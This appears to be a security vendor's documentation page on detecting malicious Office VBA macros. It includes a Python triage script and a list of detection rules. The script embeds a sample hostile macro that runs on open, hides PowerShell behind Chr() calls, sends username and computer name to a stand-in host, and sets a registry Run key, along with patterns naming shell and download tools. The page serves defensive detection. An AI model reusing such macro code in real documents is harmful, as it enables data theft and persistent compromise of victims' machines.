
Detection Method: Macro analysis

Macro analysis examines embedded code within documents, focusing primarily on Microsoft Office files that contain VBA (Visual Basic for Applications) macros. Rather than only flagging that a macro is present, it looks at what the macro does when it runs, what it appears intended to do, and whether that behaviour poses a security risk.
Macro analysis can help you detect:
  • Auto-executing macros (entry points such as Auto_Open, Workbook_Open or Document_Open) that run as soon as a document is opened
  • Obfuscated or encoded commands (for example strings assembled from Chr() calls, or base64-encoded PowerShell) that hide malicious actions
  • Suspicious API or COM object calls (such as WScript.Shell, or Win32 functions imported with Declare) that access system resources or modify settings
  • Attempts to run commands through the shell or PowerShell
  • Data exfiltration routines within macro code, such as HTTP requests that carry user or host information
For example, attackers might distribute a seemingly legitimate Excel file whose embedded macro, once enabled, downloads malware or establishes persistence on the system. Because Office blocks macros in files received from the internet until the user explicitly enables them, such attachments are typically paired with a lure asking the recipient to click "Enable Content".
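The triage logic the list above describes, written out as an added Python example (this is not Sublime Security's rule engine or any code from the page). It assumes the VBA source has already been extracted from the Office container, which in practice is done with a tool such as oletools' olevba; here two macros are constructed inline (the hostile one uses the TEST-NET address 203.0.113.10 and a base64 payload chosen for the example), so the block runs offline. It goes a step beyond pattern matching: Chr() chains are resolved and PowerShell -EncodedCommand arguments are decoded before the keyword checks run, so the obfuscated "powershell" and the hidden "IEX" are both surfaced.

```python
"""Static triage of VBA macro source for the behaviours listed above.

Added example, not Sublime Security's detection logic. Extracting the VBA
from the .xlsm/.docm/.doc container is left to a tool such as olevba; this
block takes the macro text as a string and runs on constructed samples.
"""
import base64
import re
from dataclasses import dataclass, field

# Constructed sample of a hostile-looking macro (written for this example,
# not taken from a real attachment).
SAMPLE_VBA = r'''
Private Sub Workbook_Open()
    Dim prog As String
    ' the program name is assembled from Chr() calls to dodge plain string matching
    prog = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108)
    Set sh = CreateObject("WScript.Shell")
    sh.Run prog & " -nop -w hidden -enc SQBFAFgA", 0
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "POST", "http://203.0.113.10/collect", False
    http.Send Environ("USERNAME") & "|" & Environ("COMPUTERNAME")
    sh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\upd", "C:\Users\Public\u.exe"
End Sub
'''

# Constructed benign macro: no auto-exec entry point, no shell, no network.
BENIGN_VBA = r'''
Sub FormatReport()
    Range("A1:D1").Font.Bold = True
    Columns("A:D").AutoFit
End Sub
'''

CHR_CALL = r"Chr[BW]?\(\s*\d+\s*\)"
# Three or more Chr() calls joined with "&": a string being built to hide a keyword.
CHR_CHAIN = re.compile(rf"(?:{CHR_CALL}\s*&\s*){{2,}}{CHR_CALL}", re.I)
# PowerShell -e/-ec/-enc/-EncodedCommand followed by base64 of a UTF-16LE script.
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)

# (category, label, pattern). Categories mirror the bullet list on the page.
INDICATORS = [
    ("auto_exec", "auto-executing entry point",
     re.compile(r"\b(?:Auto_?Open|Auto_?Close|AutoExec|AutoNew|Workbook_Open|Document_Open|Document_Close|Workbook_BeforeClose)\b", re.I)),
    ("obfuscation", "string built from a Chr() chain", CHR_CHAIN),
    ("obfuscation", "StrReverse()", re.compile(r"\bStrReverse\s*\(", re.I)),
    ("suspicious_api", "scriptable shell / filesystem object",
     re.compile(r'CreateObject\(\s*"(?:WScript\.Shell|Shell\.Application|Scripting\.FileSystemObject|ADODB\.Stream)"', re.I)),
    ("suspicious_api", "Win32 API imported with Declare", re.compile(r'\bDeclare\b.*\bLib\s+"', re.I)),
    ("suspicious_api", "registry write / Run key (persistence)", re.compile(r"\bRegWrite\b|\\CurrentVersion\\Run\b", re.I)),
    ("command_exec", "shell or PowerShell invocation",
     re.compile(r"\bShell\s*\(|\.Run\b|\bpowershell(?:\.exe)?\b|\bcmd(?:\.exe)?\s+/c\b|\bmshta(?:\.exe)?\b|\brundll32(?:\.exe)?\b", re.I)),
    ("exfil", "HTTP client object",
     re.compile(r'CreateObject\(\s*"(?:MSXML2\.(?:Server)?XMLHTTP|Microsoft\.XMLHTTP|WinHttp\.WinHttpRequest)', re.I)),
    ("exfil", "outbound URL", re.compile(r"https?://[^\s\"']+", re.I)),
    ("exfil", "host/user information collection", re.compile(r'\bEnviron\(\s*"(?:USERNAME|COMPUTERNAME|USERDOMAIN)"', re.I)),
    ("exfil", "URLDownloadToFile", re.compile(r"\bURLDownloadToFile", re.I)),
]


def resolve_chr_chains(src: str):
    """Replace every Chr() chain with the literal it builds; return (text, recovered strings)."""
    recovered = []

    def repl(m):
        s = "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0)))
        recovered.append(s)
        return '"' + s.replace('"', '""') + '"'

    return CHR_CHAIN.sub(repl, src), recovered


def decode_encoded_commands(text: str):
    """Decode PowerShell -EncodedCommand payloads (base64 over UTF-16LE)."""
    decoded = []
    for b64 in ENCODED_CMD.findall(text):
        try:
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not base64 / not UTF-16: leave for manual review
    return decoded


@dataclass
class Report:
    hits: dict = field(default_factory=dict)  # category -> [(label, matched text)]
    recovered_strings: list = field(default_factory=list)
    decoded_commands: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        if not self.hits:
            return "clean"
        # Auto-exec combined with execution or network activity is the pairing
        # the "auto-executing" and "high risk" rules above are built around.
        if "auto_exec" in self.hits and set(self.hits) & {"command_exec", "exfil"}:
            return "high_risk"
        return "suspicious"


def analyze_vba(src: str) -> Report:
    report = Report()
    # Pass 1: resolve Chr() chains so the keyword patterns see the real strings.
    resolved, report.recovered_strings = resolve_chr_chains(src)
    for category, label, pattern in INDICATORS:
        # Obfuscation patterns must see the original text; everything else the resolved one.
        text = src if category == "obfuscation" else resolved
        for m in pattern.finditer(text):
            report.hits.setdefault(category, []).append((label, m.group(0)))
    # Pass 2: decode any -EncodedCommand arguments now visible in the resolved text.
    report.decoded_commands = decode_encoded_commands(resolved)
    return report


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        r = analyze_vba(src)
        print(f"{name}: {r.verdict}")
        for category, hits in r.hits.items():
            for label, text in hits:
                print(f"  [{category}] {label}: {text.strip()}")
        for s in r.recovered_strings:
            print(f"  recovered string: {s!r}")
        for c in r.decoded_commands:
            print(f"  decoded -enc payload: {c!r}")
```

Running the block reports the hostile sample as high_risk with hits in all five categories, the recovered string "powershell" and the decoded payload "IEX", and the benign macro as clean. The two-pass design matters: without resolving the Chr() chain first, the PowerShell invocation would never match, which is exactly why attackers build strings that way.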
Rules that use this detection method (each entry gives the rule name, when it was last updated, its author, its types, tactics and capabilities, and the rule's feed path):

  • Suspicious VBA macros from untrusted sender
    Last updated: Jul 16th, 2025 UTC
    Author: Sublime Security
    Types, tactics & capabilities: Malware/Ransomware; Macros; File analysis; Macro analysis; Sender analysis
    Feed path: /feeds/core/detection-rules/suspicious-vba-macros-from-untrusted-sender-37cec120

  • Attachment with auto-executing macro (unsolicited)
    Last updated: Jul 16th, 2025 UTC
    Author: Sublime Security
    Types, tactics & capabilities: Malware/Ransomware; Macros; Archive analysis; Header analysis; File analysis; Macro analysis; OLE analysis; Sender analysis
    Feed path: /feeds/core/detection-rules/attachment-with-auto-executing-macro-unsolicited-af6624c3

  • Attachment with VBA macros from employee impersonation (unsolicited)
    Last updated: Jul 16th, 2025 UTC
    Author: Sublime Security
    Types, tactics & capabilities: Malware/Ransomware; Impersonation: Employee; Macros; Social engineering; Archive analysis; File analysis; Macro analysis; Sender analysis
    Feed path: /feeds/core/detection-rules/attachment-with-vba-macros-from-employee-impersonation-unsolicited-9b262123

  • Attachment with high risk VBA macro (unsolicited)
    Last updated: Jul 16th, 2025 UTC
    Author: Sublime Security
    Types, tactics & capabilities: Malware/Ransomware; Macros; File analysis; Macro analysis; OLE analysis; Sender analysis
    Feed path: /feeds/core/detection-rules/attachment-with-high-risk-vba-macro-unsolicited-a2b20e16

  • Attachment soliciting user to enable macros
    Last updated: Jul 16th, 2025 UTC
    Author: Sublime Security
    Types, tactics & capabilities: Malware/Ransomware; Macros; Archive analysis; File analysis; Macro analysis; Optical Character Recognition; Sender analysis
    Feed path: /feeds/core/detection-rules/attachment-soliciting-user-to-enable-macros-e9d75515

  • Attachment with auto-opening VBA macro (unsolicited)
    Last updated: Jul 16th, 2025 UTC
    Author: Sublime Security
    Types, tactics & capabilities: Malware/Ransomware; Macros; Archive analysis; File analysis; Macro analysis; Sender analysis
    Feed path: /feeds/core/detection-rules/attachment-with-auto-opening-vba-macro-unsolicited-d48b3e53

  • Attachment: Macro Files Containing MHT Content
    Last updated: Jun 12th, 2025 UTC
    Author: Sublime Security
    Types, tactics & capabilities: Malware/Ransomware; Credential Phishing; Evasion; Macros; Scripting; Archive analysis; File analysis; Macro analysis
    Feed path: /feeds/core/detection-rules/attachment-macro-files-containing-mht-content-4d54e40b

  • Attachment: Archive contains DLL-loading macro
    Last updated: Dec 28th, 2023 UTC
    Author: Sublime Security
    Types, tactics & capabilities: Malware/Ransomware; Exploit; LNK; Macros; Scripting; Archive analysis; File analysis; Macro analysis; YARA
    Feed path: /feeds/core/detection-rules/attachment-archive-contains-dll-loading-macro-3a193f5f

  • Attachment: Potential Sandbox Evasion in Office File
    Last updated: Dec 19th, 2023 UTC
    Author: @ajpc500
    Types, tactics & capabilities: Malware/Ransomware; Evasion; Macros; File analysis; Macro analysis
    Feed path: /feeds/core/detection-rules/attachment-potential-sandbox-evasion-in-office-file-1c591681

  • Attachment: CVE-2021-40444 - MSHTML Remote Code Execution Vulnerability
    Last updated: Dec 19th, 2023 UTC
    Author: Sublime Security
    Types, tactics & capabilities: Malware/Ransomware; Exploit; Macros; Scripting; Archive analysis; Content analysis; File analysis; Macro analysis; OLE analysis
    Feed path: /feeds/core/detection-rules/attachment-cve-2021-40444-mshtml-remote-code-execution-vulnerability-8cefcf7f

  • Attachment: Macro with Suspected Use of COM ShellBrowserWindow Object for Process Creation
    Last updated: Dec 19th, 2023 UTC
    Author: @ajpc500
    Types, tactics & capabilities: Malware/Ransomware; Macros; Scripting; Content analysis; File analysis; Macro analysis
    Feed path: /feeds/core/detection-rules/attachment-macro-with-suspected-use-of-com-shellbrowserwindow-object-for-process-creation-527fc7f0